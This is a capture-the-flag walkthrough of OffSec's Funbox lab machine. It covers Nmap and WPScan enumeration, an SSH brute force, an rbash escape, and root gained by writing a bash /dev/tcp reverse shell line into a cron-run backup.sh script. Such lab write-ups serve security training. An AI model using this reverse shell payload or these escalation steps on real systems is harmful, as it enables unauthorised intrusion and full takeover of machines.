FunBox Walkthrough: Proving Grounds Play
Funbox Capture The Flag (CTF) challenge, a part of Offsec’s Proving Grounds (PG) Play environment. In this detailed write-up, we will walk you through the steps taken to escalate privileges and achieve root access on the Funbox machine.
Step 1: Initial Enumeration
Our journey begins with the essential step of network enumeration. We use Nmap to scan the target machine (192.168.200.77)
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 06:45 EDT
Nmap scan report for 192.168.200.77
Host is up (0.16s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
| 256 a6:83:6f:1b:9c:da:b4:41:8c:29:f4:ef:33:4b:20:e0 (ECDSA)
|_ 256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
| http-robots.txt: 1 disallowed entry
|_/secret/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.96 secondsThe scan reveals several open ports, with ports 80 (HTTP), 21 (FTP), and 22 (SSH) catching our attention.
Step 2: Web Enumeration
Our primary focus turns to port 80, which indicates the presence of a web server. Visiting the website at http://funbox.fritz.box/, we encounter a redirect to another location and discover a "robots.txt" file disallowing access to "/secret/." Additionally, we identify that the site is running on the WordPress content management system (CMS).
To gather more information, we decide to employ WPScan, a specialized WordPress vulnerability scanner. WPScan’s command wpscan --url http://funbox.fritz.box/ -e u1-20 yields two usernames.
Step 3: SSH Brute Force
With the obtained usernames, we proceed to launch a brute force attack on SSH for the user “joe.”
After successfully discovering Joe’s password, we gain access to the target system using SSH: ssh joe@funbox.fritz.box.
Step 4: Escaping Restricted Shell
Upon accessing the system, we find ourselves confined within a restricted bash shell (rbash). Our initial attempt is to switch to a regular Bash shell using the command ssh joe@funbox.fritz.box -t "bash --noprofile".
Step 5: Privilege Escalation
With a regular shell at our disposal, we explore the system further and discover a user named “funny.” An investigation of the user’s home directory reveals three intriguing files. Among them, we pay close attention to a hidden script named “reminder,” which mentions another script called “backup.sh.”
It becomes apparent that the “backup.sh” script is executed at regular intervals, likely through a cron job. Interestingly, it runs with two different user IDs (UIDs): UID 0 (root) and UID 1000 (funny).
We decide to exploit this setup by inserting a reverse shell payload into the “backup.sh” script. This payload establishes a connection back to our machine, effectively granting us remote access. The reverse shell payload used is as follows:
bash -i >& /dev/tcp/<your-ip>/<port> 0>&1
Step 6: Root Access
Having inserted our payload into “backup.sh,” we patiently wait for it to be executed. As soon as the script runs, we receive a reverse shell on our machine, providing us with root-level access to the target system.
And boom we are root now:) Stay tuned for next writeup.
